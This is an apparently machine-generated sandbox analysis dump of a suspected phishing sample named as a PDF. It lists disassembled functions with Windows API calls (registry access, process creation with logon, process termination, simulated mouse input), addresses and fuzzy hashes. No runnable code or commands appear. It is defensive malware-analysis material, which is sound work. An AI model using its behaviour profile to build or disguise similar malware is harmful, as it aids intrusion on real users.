                                                                                                          • Instruction ID: dba0a3c84ffd0e07ebdd1658d84bb8d8f297fe2c713db1caf2f67ef510c12c73
                                                                                                          • Opcode Fuzzy Hash: 5c2df0fd1407746ad788ff265da8dc8a72d317927605c3bf292e698b8a28081d
                                                                                                          • Instruction Fuzzy Hash: 84218876605204AF9B20DFB8DC88DAB77ECEB49360B50C226F956CB660DA78DC41C774
                                                                                                          APIs
                                                                                                            • Part of subcall function 00751D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00751D73
                                                                                                            • Part of subcall function 00751D35: GetStockObject.GDI32(00000011), ref: 00751D87
                                                                                                            • Part of subcall function 00751D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00751D91
                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007D7632
                                                                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007D763F
                                                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007D764A
                                                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007D7659
                                                                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007D7665
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                                          • String ID: Msctls_Progress32
                                                                                                          • API String ID: 1025951953-3636473452
                                                                                                          • Opcode ID: 52f6aa4610c1b74b2fdd3cd1e853b4f390ac5f530fc0e3f02651cf33a3e3e7f7
                                                                                                          • Instruction ID: ba2b2e782e139723309e08190ae99a2e5388874f4e104ac54279d017a5e9ad68
                                                                                                          • Opcode Fuzzy Hash: 52f6aa4610c1b74b2fdd3cd1e853b4f390ac5f530fc0e3f02651cf33a3e3e7f7
                                                                                                          • Instruction Fuzzy Hash: EE1190B2110219BFEF158F64CC85EE77F6DEF087A8F014115FA44A61A0DA76EC21DBA4
                                                                                                          APIs
                                                                                                          • __init_pointers.LIBCMT ref: 00779AE6
                                                                                                            • Part of subcall function 00773187: EncodePointer.KERNEL32(00000000), ref: 0077318A
                                                                                                            • Part of subcall function 00773187: __initp_misc_winsig.LIBCMT ref: 007731A5
                                                                                                            • Part of subcall function 00773187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00779EA0
                                                                                                            • Part of subcall function 00773187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00779EB4
                                                                                                            • Part of subcall function 00773187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00779EC7
                                                                                                            • Part of subcall function 00773187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00779EDA
                                                                                                            • Part of subcall function 00773187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00779EED
                                                                                                            • Part of subcall function 00773187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00779F00
                                                                                                            • Part of subcall function 00773187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00779F13
                                                                                                            • Part of subcall function 00773187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00779F26
                                                                                                            • Part of subcall function 00773187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00779F39
                                                                                                            • Part of subcall function 00773187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00779F4C
                                                                                                            • Part of subcall function 00773187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00779F5F
                                                                                                            • Part of subcall function 00773187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00779F72
                                                                                                            • Part of subcall function 00773187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00779F85
                                                                                                            • Part of subcall function 00773187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00779F98
                                                                                                            • Part of subcall function 00773187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00779FAB
                                                                                                            • Part of subcall function 00773187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00779FBE
                                                                                                          • __mtinitlocks.LIBCMT ref: 00779AEB
                                                                                                          • __mtterm.LIBCMT ref: 00779AF4
                                                                                                            • Part of subcall function 00779B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00779AF9,00777CD0,0080A0B8,00000014), ref: 00779C56
                                                                                                            • Part of subcall function 00779B5C: _free.LIBCMT ref: 00779C5D
                                                                                                            • Part of subcall function 00779B5C: DeleteCriticalSection.KERNEL32(0080EC00,?,?,00779AF9,00777CD0,0080A0B8,00000014), ref: 00779C7F
                                                                                                          • __calloc_crt.LIBCMT ref: 00779B19
                                                                                                          • __initptd.LIBCMT ref: 00779B3B
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00779B42
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                          • String ID:
                                                                                                          • API String ID: 3567560977-0
                                                                                                          • Opcode ID: 29653213e43ad3eec37558e7532a7f1661287f13fc702aab895493fe8b0596bd
                                                                                                          • Instruction ID: b1ae80c98b44099a1cebbce81e289c5211cb07d82ed196b64ba20ff9aaa8c62a
                                                                                                          • Opcode Fuzzy Hash: 29653213e43ad3eec37558e7532a7f1661287f13fc702aab895493fe8b0596bd
                                                                                                          • Instruction Fuzzy Hash: 26F0627260B711E9EE747674BC0BA4A37919F027B0B21CA2AF65CC50E2FE18884141A1
                                                                                                          APIs
                                                                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00773F85), ref: 00774085
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0077408C
                                                                                                          • EncodePointer.KERNEL32(00000000), ref: 00774097
                                                                                                          • DecodePointer.KERNEL32(00773F85), ref: 007740B2
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                          • String ID: RoUninitialize$combase.dll
                                                                                                          • API String ID: 3489934621-2819208100
                                                                                                          • Opcode ID: ce6998fcc372682cd91a9d4a98e513265ae315eef54e85b23009c1cfecec5fe0
                                                                                                          • Instruction ID: feb50810dd796c04fd5a737bc75643f23c2eb575c21475d7f8d475493baef268
                                                                                                          • Opcode Fuzzy Hash: ce6998fcc372682cd91a9d4a98e513265ae315eef54e85b23009c1cfecec5fe0
                                                                                                          • Instruction Fuzzy Hash: 28E092B0682204BBEA11AF61ED09B853AB8BB04782F11C036F202E11A0CBBA4611CA18
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$__itow__swprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 3253778849-0
                                                                                                          • Opcode ID: 24132d38f82a37ab7f3bdb1bcae677fd77bf2f02b632f77fef73ae5b321cb7ec
                                                                                                          • Instruction ID: 06b23fc0b8c3901d881c54472ffab3208fe831f062f5f357f6c90611b982f6b7
                                                                                                          • Opcode Fuzzy Hash: 24132d38f82a37ab7f3bdb1bcae677fd77bf2f02b632f77fef73ae5b321cb7ec
                                                                                                          • Instruction Fuzzy Hash: 1B616A3050065ADBCF11EF60CC8ABFE37A5AF05308F048559FE595B192DBBCA919CB90
                                                                                                          APIs
                                                                                                            • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
                                                                                                            • Part of subcall function 007D0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007CFDAD,?,?), ref: 007D0E31
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D02BD
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007D02FD
                                                                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 007D0320
                                                                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007D0349
                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 007D038C
                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 007D0399
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 4046560759-0
                                                                                                          • Opcode ID: 9ab3dfe41b552248a49853b28df2a95eb9796287c18695e0cb4c06854809adaf
                                                                                                          • Instruction ID: 372aa2f58df16339caeb5260e5ff970aeb960e247ccbc20850bb4cbd0c89f644
                                                                                                          • Opcode Fuzzy Hash: 9ab3dfe41b552248a49853b28df2a95eb9796287c18695e0cb4c06854809adaf
                                                                                                          • Instruction Fuzzy Hash: C2514B71108200DFC714EF64D849EAABBF9FF85314F04491EF945872A1DB79E905CB92
                                                                                                          APIs
                                                                                                          • GetMenu.USER32(?), ref: 007D57FB
                                                                                                          • GetMenuItemCount.USER32(00000000), ref: 007D5832
                                                                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007D585A
                                                                                                          • GetMenuItemID.USER32(?,?), ref: 007D58C9
                                                                                                          • GetSubMenu.USER32(?,?), ref: 007D58D7
                                                                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 007D5928
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Item$CountMessagePostString
                                                                                                          • String ID:
                                                                                                          • API String ID: 650687236-0
                                                                                                          • Opcode ID: 81550ece78d79b56c4e1db90d64a01dcc8fa2b3b680329e616a5980a7713aa7b
                                                                                                          • Instruction ID: 96fb92fa7cda289cdca0eb176575ac4a100d3e803765323fff0606d549211d44
                                                                                                          • Opcode Fuzzy Hash: 81550ece78d79b56c4e1db90d64a01dcc8fa2b3b680329e616a5980a7713aa7b
                                                                                                          • Instruction Fuzzy Hash: D4516E31E01615EFCF11EF64C845AAEB7B5EF48320F14806AED06BB351CB78AE419B94
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 007AEF06
                                                                                                          • VariantClear.OLEAUT32(00000013), ref: 007AEF78
                                                                                                          • VariantClear.OLEAUT32(00000000), ref: 007AEFD3
                                                                                                          • _memmove.LIBCMT ref: 007AEFFD
                                                                                                          • VariantClear.OLEAUT32(?), ref: 007AF04A
                                                                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 007AF078
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 1101466143-0
                                                                                                          • Opcode ID: a951d0dffb7c2e3b282f979901e8daa178b99e110e6e6a6eba7764405e029e23
                                                                                                          • Instruction ID: 33d3ec1a085fe09a3f05538afd9c73b53ffc47ccebe1ae8d5e7ab5bb5b471f04
                                                                                                          • Opcode Fuzzy Hash: a951d0dffb7c2e3b282f979901e8daa178b99e110e6e6a6eba7764405e029e23
                                                                                                          • Instruction Fuzzy Hash: 16515E75A00209DFDB14DF58C884AAAB7B8FF8D314B15856AED59DB301E335E911CF90
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 007B2258
                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007B22A3
                                                                                                          • IsMenu.USER32(00000000), ref: 007B22C3
                                                                                                          • CreatePopupMenu.USER32 ref: 007B22F7
                                                                                                          • GetMenuItemCount.USER32(000000FF), ref: 007B2355
                                                                                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 007B2386
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 3311875123-0
                                                                                                          • Opcode ID: 1195c19135a554585206656a0b4aea5450f68583379d236a2d65b54cd05542b2
                                                                                                          • Instruction ID: eb5b8afe76023768c694a8e6fabf1adc4646d838e3fea989e78c85b3747297bf
                                                                                                          • Opcode Fuzzy Hash: 1195c19135a554585206656a0b4aea5450f68583379d236a2d65b54cd05542b2
                                                                                                          • Instruction Fuzzy Hash: FF51A070602209DBDF21DF64D888BEDBBF5BF46314F148129E811972A2D77C9946CB51
                                                                                                          APIs
                                                                                                            • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                                                                                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 0075179A
                                                                                                          • GetWindowRect.USER32(?,?), ref: 007517FE
                                                                                                          • ScreenToClient.USER32(?,?), ref: 0075181B
                                                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0075182C
                                                                                                          • EndPaint.USER32(?,?), ref: 00751876
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                          • String ID:
                                                                                                          • API String ID: 1827037458-0
APIs
• ShowWindow.USER32(008157B0,00000000,00E55C18,?,?,008157B0,?,007DB5A8,?,?), ref: 007DB712
• EnableWindow.USER32(00000000,00000000), ref: 007DB736
• ShowWindow.USER32(008157B0,00000000,00E55C18,?,?,008157B0,?,007DB5A8,?,?), ref: 007DB796
• ShowWindow.USER32(00000000,00000004,?,007DB5A8,?,?), ref: 007DB7A8
• EnableWindow.USER32(00000000,00000001), ref: 007DB7CC
• SendMessageW.USER32(?,0000130C,?,00000000), ref: 007DB7EF
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
APIs
• GetForegroundWindow.USER32(?,?,?,?,?,?,007C4E41,?,?,00000000,00000001), ref: 007C70AC
  • Part of subcall function 007C39A0: GetWindowRect.USER32(?,?), ref: 007C39B3
• GetDesktopWindow.USER32 ref: 007C70D6
• GetWindowRect.USER32(00000000), ref: 007C70DD
• mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 007C710F
  • Part of subcall function 007B5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B52BC
• GetCursorPos.USER32(?), ref: 007C713B
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007C7199
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
• String ID:
• API String ID: 4137160315-0
APIs
  • Part of subcall function 007A80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007A80C0
  • Part of subcall function 007A80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007A80CA
  • Part of subcall function 007A80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007A80D9
  • Part of subcall function 007A80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007A80E0
  • Part of subcall function 007A80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007A80F6
• GetLengthSid.ADVAPI32(?,00000000,007A842F), ref: 007A88CA
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 007A88D6
• HeapAlloc.KERNEL32(00000000), ref: 007A88DD
• CopySid.ADVAPI32(00000000,00000000,?), ref: 007A88F6
• GetProcessHeap.KERNEL32(00000000,00000000,007A842F), ref: 007A890A
• HeapFree.KERNEL32(00000000), ref: 007A8911
Similarity
• API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
• String ID:
• API String ID: 3008561057-0
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007A85E2
• OpenProcessToken.ADVAPI32(00000000), ref: 007A85E9
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 007A85F8
• CloseHandle.KERNEL32(00000004), ref: 007A8603
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007A8632
• DestroyEnvironmentBlock.USERENV(00000000), ref: 007A8646
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
APIs
• GetDC.USER32(00000000), ref: 007AB7B5
• GetDeviceCaps.GDI32(00000000,00000058), ref: 007AB7C6
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 007AB7CD
• ReleaseDC.USER32(00000000,00000000), ref: 007AB7D5
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 007AB7EC
• MulDiv.KERNEL32(000009EC,?,?), ref: 007AB7FE
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00770193
• MapVirtualKeyW.USER32(00000010,00000000), ref: 0077019B
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 007701A6
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 007701B1
• MapVirtualKeyW.USER32(00000011,00000000), ref: 007701B9
• MapVirtualKeyW.USER32(00000012,00000000), ref: 007701C1
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007B53F9
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 007B540F
• GetWindowThreadProcessId.USER32(?,?), ref: 007B541E
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007B542D
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007B5437
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007B543E
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
                                                                                                          APIs
                                                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 007B7243
                                                                                                          • EnterCriticalSection.KERNEL32(?,?,00760EE4,?,?), ref: 007B7254
                                                                                                          • TerminateThread.KERNEL32(00000000,000001F6,?,00760EE4,?,?), ref: 007B7261
                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00760EE4,?,?), ref: 007B726E
                                                                                                            • Part of subcall function 007B6C35: CloseHandle.KERNEL32(00000000,?,007B727B,?,00760EE4,?,?), ref: 007B6C3F
                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 007B7281
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,00760EE4,?,?), ref: 007B7288
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                          • String ID:
                                                                                                          • API String ID: 3495660284-0
                                                                                                          • Opcode ID: cc1ec99bb17e55491b2e2f7c6774f7a4c71c56d8f7bacd192809e92ae8ba0ad2
                                                                                                          • Instruction ID: 1aef05f060671acdd61d4fed9f97932c018ff6add3596faa0eade1c9cd90413d
                                                                                                          • Opcode Fuzzy Hash: cc1ec99bb17e55491b2e2f7c6774f7a4c71c56d8f7bacd192809e92ae8ba0ad2
                                                                                                          • Instruction Fuzzy Hash: C2F08236542612EBD7112B64ED4CADF7739FF45702B104533F643910A0CB7E6901CB64
                                                                                                          APIs
                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007A899D
                                                                                                          • UnloadUserProfile.USERENV(?,?), ref: 007A89A9
                                                                                                          • CloseHandle.KERNEL32(?), ref: 007A89B2
                                                                                                          • CloseHandle.KERNEL32(?), ref: 007A89BA
                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 007A89C3
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 007A89CA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                          • String ID:
                                                                                                          • API String ID: 146765662-0
                                                                                                          • Opcode ID: 6bb56fb48f429c37275c1f53a158a297bc8705efa3d1c79acde48ec5a7507598
                                                                                                          • Instruction ID: c9e9d49794aab6145ce7aa3a184005001cf46356b467754013e4e72bc4e0eef9
                                                                                                          • Opcode Fuzzy Hash: 6bb56fb48f429c37275c1f53a158a297bc8705efa3d1c79acde48ec5a7507598
                                                                                                          • Instruction Fuzzy Hash: 9EE0C236105005FBDA012FE5EC0C94ABF79FB89322B50C232F21A81170CB3A9820DB58
                                                                                                          APIs
                                                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,007E2C7C,?), ref: 007A76EA
